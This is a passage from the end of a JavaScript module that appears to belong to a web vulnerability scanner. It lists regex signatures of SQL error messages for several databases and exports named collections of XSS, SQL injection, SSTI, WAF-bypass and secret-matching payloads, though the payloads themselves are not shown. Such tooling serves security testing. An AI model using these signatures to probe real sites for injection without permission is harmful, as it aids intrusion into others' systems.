  { name: "Cloudflare Turnstile", patterns: ["turnstile.cloudflare.com"] },
];

// ── SQL ERROR SIGNATURES ──────────────────────────────────────

const SQL_ERROR_SIGNATURES = [
  // MySQL
  { pattern: /you have an error in your sql syntax/i, db: "MySQL" },
  { pattern: /warning: mysql_/i, db: "MySQL" },
  { pattern: /mysql_fetch_/i, db: "MySQL" },
  { pattern: /valid mysql result/i, db: "MySQL" },
  { pattern: /supplied argument is not a valid mysql/i, db: "MySQL" },
  { pattern: /column count doesn't match/i, db: "MySQL" },
  { pattern: /unknown column/i, db: "MySQL" },
  { pattern: /table '.*' doesn't exist/i, db: "MySQL" },
  // MSSQL
  {
    pattern: /unclosed quotation mark after the character string/i,
    db: "MSSQL",
  },
  { pattern: /quoted string not properly terminated/i, db: "MSSQL" },
  { pattern: /incorrect syntax near/i, db: "MSSQL" },
  { pattern: /microsoft ole db provider for sql server/i, db: "MSSQL" },
  { pattern: /odbc sql server driver/i, db: "MSSQL" },
  { pattern: /syntax error converting/i, db: "MSSQL" },
  { pattern: /operand type clash/i, db: "MSSQL" },
  // PostgreSQL
  { pattern: /pg::syntaxerror/i, db: "PostgreSQL" },
  { pattern: /org\.postgresql\.util/i, db: "PostgreSQL" },
  { pattern: /unterminated quoted string at or near/i, db: "PostgreSQL" },
  { pattern: /syntax error at or near/i, db: "PostgreSQL" },
  // Oracle
  { pattern: /ora-[0-9]{5}/i, db: "Oracle" },
  { pattern: /oracle error/i, db: "Oracle" },
  { pattern: /quoted string not properly terminated/i, db: "Oracle" },
  // SQLite
  { pattern: /sqlite3::/i, db: "SQLite" },
  { pattern: /sqlite_error/i, db: "SQLite" },
  { pattern: /no such table/i, db: "SQLite" },
  // Generic
  { pattern: /sql syntax/i, db: "Generic" },
  { pattern: /database error/i, db: "Generic" },
  { pattern: /fatal error.*sql/i, db: "Generic" },
  { pattern: /invalid query/i, db: "Generic" },
  { pattern: /sql command not properly ended/i, db: "Generic" },
];

module.exports = {
  ALL_XSS_PAYLOADS,
  XSS_HTML_CONTEXT,
  XSS_ATTR_CONTEXT,
  XSS_JS_CONTEXT,
  XSS_URL_CONTEXT,
  XSS_EVENT_HANDLERS,
  XSS_BYPASS_WAF,
  XSS_POLYGLOT,
  XSS_DOM_BASED,
  XSS_CSP_BYPASS,
  ALL_SQLI_PAYLOADS,
  SQLI_ERROR_BASED,
  SQLI_MYSQL,
  SQLI_MSSQL,
  SQLI_POSTGRESQL,
  SQLI_ORACLE,
  SQLI_SQLITE,
  SQLI_BLIND_TIME,
  SQLI_BLIND_BOOLEAN,
  SQLI_UNION_BASED,
  SQLI_STACKED,
  SQLI_WAF_BYPASS,
  SQLI_SECOND_ORDER,
  SSTI_PAYLOADS,
  PROTOTYPE_POLLUTION_PAYLOADS,
  SECRET_PATTERNS,
  TECH_FINGERPRINTS,
  SQL_ERROR_SIGNATURES,
};
